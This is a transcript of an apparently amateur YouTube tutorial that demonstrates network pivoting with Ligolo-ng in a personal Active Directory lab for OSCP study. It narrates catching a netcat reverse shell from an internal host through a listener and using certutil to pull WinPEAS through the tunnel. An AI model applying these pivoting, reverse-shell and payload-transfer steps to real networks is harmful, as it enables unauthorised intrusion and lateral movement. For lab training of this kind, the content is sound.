What's going on, guys, and welcome to my first ever YouTube video. In today's video, I'll be going over how to do simple network pivoting with this fantastic tool called Ligolo. This tool is extremely useful if you're currently studying for something like the OSCP, the PNPT, or you even work on labs, pro labs like Hack the Box Pro Labs or various Try Hack Me labs in general. So in this video, I'll go over how to set up Ligolo on your Kali VM. We'll go over how to set up a simple network pivot so you can access an internal network and start doing further Active Directory attacks. And then finally, I'll demonstrate how we can leverage the listener functionality to ensure that we can transfer files to and from internal machines, as well as receive reverse shell connections from internal machines. So before we get in the terminal, I do want to give a brief visual overview of the lab that I've set up for us today. As we can see here, we will be attacking from the perspective of a Kali VM here. And we'll be using MSO1 to pivot into this small internal Active Directory network I've set up for us. So the Active Directory network is set up very simply. We've just got a domain controller, MSO2, which is just a standard Windows 10 client, and then we have MSO1, also a standard Windows 10 client. But the key here is that MSO1 is connected to both the external network, where our Kali attack box is, and then also connected to the internal network, where the rest of the domain and the domain machines are. So we'll be able to leverage Ligolo to pivot through MSO1 and attack machines on the internal network. So let's go ahead and talk about setting up Ligolo-NG on your Kali VM. First thing you're going to want to do is go ahead and head to the Ligolo-NG GitHub page, as you see here. We'll go ahead and come up to the Releases tab. Wait a second for this guy to load. So in the releases page, you'll see two types of files. You'll see Ligolo agent files and Ligolo proxy files. So in short, we'll need one of each, right? We'll need a proxy file, which is going to be executed on the our main attacking machine. So since we're attacking from a Linux machine, we're going to go ahead and need the Ligolo proxy Linux 64-bit file here. And then since we are pivoting through a Windows host, MSO1, which is a Windows 64-bit host, we're going to need a Windows 64-bit agent file. The agent file is what's executed on the actual pivot host or jump host. So you want to make sure you have the right architecture or agent file there. So we'll need this Windows 64-bit agent file, and we'll also need the Linux 64-bit proxy file. Go ahead and download both of those to your machine. Also, if you're in a situation where you do have access to maybe the network that you're trying to pivot through, go ahead and upload that Windows agent file to your target host. So as we can see here in my Ligolo demo directory, I do have the agent.exe file. I also have the Ligolo proxy Linux folder here with the proxy executable here. And I've already uploaded the agent.exe onto MSO1. So I have a simulated administrative reverse shell here on MSO1. We can do a quick who am I, or just local admin number 1. We can look at the desktop and we see our Ligolo agent is on MSO1, our target box right now. So before we can go ahead and set up the network pivot, let's go ahead and set up Ligolo on our Kali VM. So right from the GitHub, the setup is basically copy and paste, but I'll go ahead and walk us through it here. We're going to go ahead and start right here, and we're going to add an interface to our Kali machine. So forgive me as I go ahead and copy these commands over. But the first command we're going to want to run right here is just creating the interface. And take note that I'm using the user Kali right here because I'm obviously the Kali user. If you're a different user on your Kali VM or your attack machine, you're going to want to make sure, I guess, you put the proper user there. So we'll go ahead and hit enter and execute that. That runs good. Next command we'll go ahead and take right from the GitHub, sudo IP link set Ligolo up. So this just enables the interface. Go ahead and run that. That's fine. So with those two commands done, we can go ahead and run our Ligolo proxy file. So we'll go ahead and cd into our Ligolo proxy directory where we have the proxy executable. We'll go ahead and execute proxy, and we'll just do -h, and we'll look at the help page right here. So you can see a couple options pop up. We have auto cert, cert file, key file, max and flight, self cert. So these are all options that if you need to use them for your purposes, maybe you're on a pen test, or you need to set up certificates when you're making connections back to this proxy server, then so be it. In the context of the OSCP labs or just general CTF labs, you really don't need to worry about the certificates as much. So we'll go ahead and just run the proxy server here with the self cert option. Okay. So our proxy server is running. we'll make note that it's listening on all interfaces on 116.01. Okay. Now back on our Windows MS-01 machine, right, with our simulated admin shell here, we'll go ahead and execute the agent. So we'll go ahead and just do Ligolo agent.exe. We'll do -connect, and then we'll enter the IP address of our Kali VM or our Ligolo proxy server. So that will be 192.168.85.128, and then we want to specify the port 11601. Okay. And then final option, because we use the self-cert option with our Ligolo proxy server up in the upper terminal, we do want to add the option ignore -cert here. That way the connection can be established. Okay. It may take a second for it to hit our Ligolo proxy server. We'll just be ready for that. All right, so after a short intermission, we finally get our agent connection here. We can see agent joined, Win client number 1, local admin 1 at Windows client number 1. Cool. So in our Ligolo proxy, we can type some, let's just start with help actually. So we see a couple options here. First thing we want to do is we'll type session. And we'll just look at the various sessions we have, and you can see we do have our Windows client number 1 session right here. So we'll go ahead and hit number 1. Okay. We can confirm some information about the target by typing, or about the agent in this case. The agent in this case is MS-01, so we'll type ifconfig. And we can see here that the agent has 2 interfaces. So it's got a 10.10.120.131 IP address, and it's also got a oh, okay. Oh, yeah, here it is. The 192.168.85.136 IP address. I didn't see that at first. So it has a couple interfaces here. The interface that we are interested in is this interface number 1, which tells us that it is connected to the internal network, which is a 10.10.120 network. So our pivot is not set up yet. We just have our agent session initiated and connected in our Ligolo proxy. So now let's go ahead and add our pivot, okay? So in order to add our pivot, we need to make an addition to our routing table. So we'll open up another terminal here. And since we know we want to go to the 10.10.120.0/24 network, we'll go ahead and just run this command right here, which will add the 10.10.120.0 network to our routing table via the Ligolo interface. We'll execute that. Oh, misspelled the password there. Okay. We can confirm that by typing IP route list, and we can see we have a route to the 10.10.120 network via the Ligolo interface. Okay, almost there. Final step, all right? Now with the route added to our routing table, we want to come back into our proxy session or our proxy server on Ligolo. We want to make sure we are in the right session, so we'll re-enter the number 1 session here, and then we'll just run start. Cool. So now the tunnel is started basically, and now we can access the internal network. So real quick check that I like to do just to make sure that my network pivot is working. I just like to run a quick crackmap exec command, just a quick SMB command against the internal subnet. So we'll go ahead and run this here. And if crackmap can resolve and identify and fingerprint the internal machines, then we know we have access. And there we go. So we can identify that, we've got Windows client number 2 here. It actually picks up my own desktop, which is interesting. And it does pick up Windows client number 1. Looks like my domain controller died, went to sleep in this process, so that didn't pick that up. But we do see, hey, we can see Windows client number 2. So now we know that our network pivot's working, and now we can start performing any of our further internal network attacks, maybe Kerber roasting or password spraying, things like that from this perspective. So from here, we'll go ahead and talk about how to use the Ligolo listeners to receive both a reverse shell connection and how we can use the listeners to ensure that we can transfer files to and from machines on the internal network, namely MS-02. So with access to the internal network now, let's obtain a reverse shell from MS-02. To do this, we'll be using Ligolo to forward the reverse shell connection back to us via the usage of listeners. So we're going to go ahead and assume that we've found some type of remote code execution vulnerability that sends a reverse shell back to us. But for the sake of this demonstration, I'm going to be executing those commands directly from MS-02 as seen here. The concept is the same. If you have an RCE that you pulled off of GitHub or exploit DB, let's just assume that I here am executing those actual command executions. So commands. So using our simulated command execution, I'm going to be executing netcat on MSO2. As we can see, the command is already staged. So traditionally, when we execute this netcat command to get a reverse shell, we would naturally want to make sure that the IP address that we provide here is the IP address of our Kali machine. But since MSO2 is on an internal network, it actually isn't going to be able to reach back out to our Kali VM directly. So before we try to attempt this reverse shell, let's go ahead and set up a listener here. We can see we set up a listener on 4444. We'll come back to MSO2 using our simulated command execution. We'll go ahead and execute netcat, targeting the IP address of our Kali VM, port 4444, and we'll go ahead and execute this, okay? Now back in our Kali VM, we can see there's obviously no shell here, okay? We didn't catch a reverse shell connection. So this is where Ligolo comes into play. In order to catch reverse shells from machines on an internal network or machines that are on a network that we're pivoting into, we need to add a listener to our Ligolo agent. So to do this, we'll come back into our Ligolo proxy above here, and we'll use the command, we'll use the listener add command, okay? And I'll drop it in here for us right now. So we'll go ahead and type in listener add --addr, and we'll say 0.0.0.0 for all interfaces, and we'll say port 1234. Any connection that comes into MSO1 on port 1234, we're going to say --2 or forward it to our local host at 4444. Okay, so we'll go ahead and hit enter there. You can see it says listener created on remote agent. We'll do listener list, and we can confirm that we have an active listener on the MSO1 Win client number 1 machine, right? So really what this means is that any connection that comes into client number 1 on port 1234 is actually going to be redirected to us on our local host IP at 4444. So because we have our listener set up at 4444, that's fine. We can keep that the same. That's where we are expecting a reverse shell connection to come from. However, on Windows client on MSO2, we actually need to adjust the IP address we give it. So we'll come back to Windows client number 2, and real quick, let me just check the IP address here. We can see that MSO1 has an internal IP address of 10.10.120.131. The key here is we want the internal IP address. So 10.10.120.131. So when we come back to our netcat command, we will just change the IP address here, and we will say 10.10.120.131, and we're going to say port 1234. Okay. Now you might say this isn't the IP address of my Kali VM. What are we doing here? We're actually sending a reverse shell to the listener. Okay. So we're actually sending a reverse shell to MSO1 on port 1234, and because we have this listener set up with Ligolo, it's actually going to come back to us on port 4444. So watch. So we have our listener set up on 4444. We have our simulated remote code execution here, sending a shell to MSO1 on port 1234. Let's go ahead and execute it. And there we go. And now we received our shell here. And now we have our shell on Win client number 2. So now we are on MSO2 and moving laterally, so to speak, through the AD domain. So from here, now that we have our shell, let's go ahead and talk about transferring files. So now that we have our shell and we know how to use the listeners to obtain a shell, using a listener to set up a file transfer kind of tunnel is super easy. So we have our shell down here. We can do who am I, cool, host name, all that fun stuff. Now, let's say we want to get WinPs up here, right? Typically in our OSCP prep or whatnot, we want to get our shell, and then the very next thing is we want to go ahead and upload our WinPs, our LinPs, our PrivS check, our seatbelt, and all that type of stuff. So now we have our low priv shell, so let's go ahead and set up a listener to do some file transfers. So we're going to go back into our Ligolo proxy. Let's go ahead and grab that listener add command again. And let's go ahead and add another listener. We'll say 0.0.0 on port 1235 is actually going to come back to us on port 80, okay? And the reason why I'm choosing port 80 here is because this is where I'm going to run my Python web server on port 80, okay? So we're basically adding a dedicated listener here for file transferring. Go ahead and add that, confirm with listener list, and now you see we have 2 listeners here on MSO1, which is our agent. We have a listener on port 1234, which forwards connections back to us on 4444. So this first listener is primarily acting as our quote-unquote reverse shell listener. And then the second listener we have here is listening on 1235, and anytime that MSO1 receives a connection on 1235, it's actually going to be sending the connection back to us on port 80, okay? So this is where it's going to work good. So in our Kali VM, let's go ahead and set up a Python web server. I've already done that here using a command alias. I have WPE server, and I just have all of my various OSCP, CTF type of Windows Privesc tools in here. You can see we've got ADPs. I do have Chisel. We've got some of the potatoes. We've got Nishang, PowerView, some reverse shells, but we have WinPs here at the bottom, okay? And we're running this on 80. So we'll go ahead and leave this running. Now let's say, all right, we want to grab WinPs. So we want to grab WinPs64.exe. So using our reverse shell, just like we normally would, we'll just run certutil URL cache -f HTTP. Now again, the key here is the IP we specify. Traditionally, you might say, well, I'm going to put the IP address of my Kali VM because that's where I'm hosting the Python web server. But because we are trying to transfer files through a pivot, the IP that we provide here needs to be the IP address of MSO1. It needs to leverage this listener that we use. So we're going to say, we're going to put the internal IP address of MSO1, and we're going to say port 1235. Again, why are we specifying port 1235? Because any connections that come into MSO1 on port 1235 are actually going to come back to us on port 80. And because we have our Python web server listening on port 80 and we want to transfer files, that's the kind of connection tunnel we want to set up here. Okay, so we'll say HTTP 10.10.120.131 1235, and we want WinPs64.exe, and we'll output that to WinPs.exe. Okay, and you can see the command completed successfully. If we go to our Python web server, we can see we actually see a GET request for WinPs from 127001, which means that that certutil command effectively and successfully used our tunnel here, used our listener, and now we can see on Windows client number 2 we have WinPs there. So in conclusion, that's how we use Ligolo to set up a network pivot. Right, we can use a compromised host, set up a Ligolo agent, set up the network pivot, and then start scanning and running our attacks on the internal network. We can also use the Ligolo listener feature here, as seen here in the top terminal, to go ahead and obtain reverse shell connectivity from machines on the internal network. Right, so if we're trying to receive a reverse shell on port 4444, we'd want to set up a listener similar to this, and then appropriately adjust our remote code execution exploit, if you will. Just like you would typically grab an exploit off of exploit DB and you need to modify it a little bit, this would be, the modifications you would make would be, the IP address and the port, right? You want to point it at MSO1 or whatever your listener set up at, and whatever port you choose here, right? In this case, we did 1234. And then finally, using our shell on Windows client number 2, I showed you guys how we can use another listener to ensure that we can transfer files back and forth, and we actually went ahead and grabbed WinPs. So if you guys like this video, let me know. This is my first ever YouTube video, so hopefully you guys learned something from it. If you're currently studying for the OSCP, good luck. Feel free to reach out if you have any questions or tips. I did just take it and passed it, so it's still fresh in the mind. And yeah, hope you guys enjoy using Ligolo, and let me know if you have any questions. Thanks.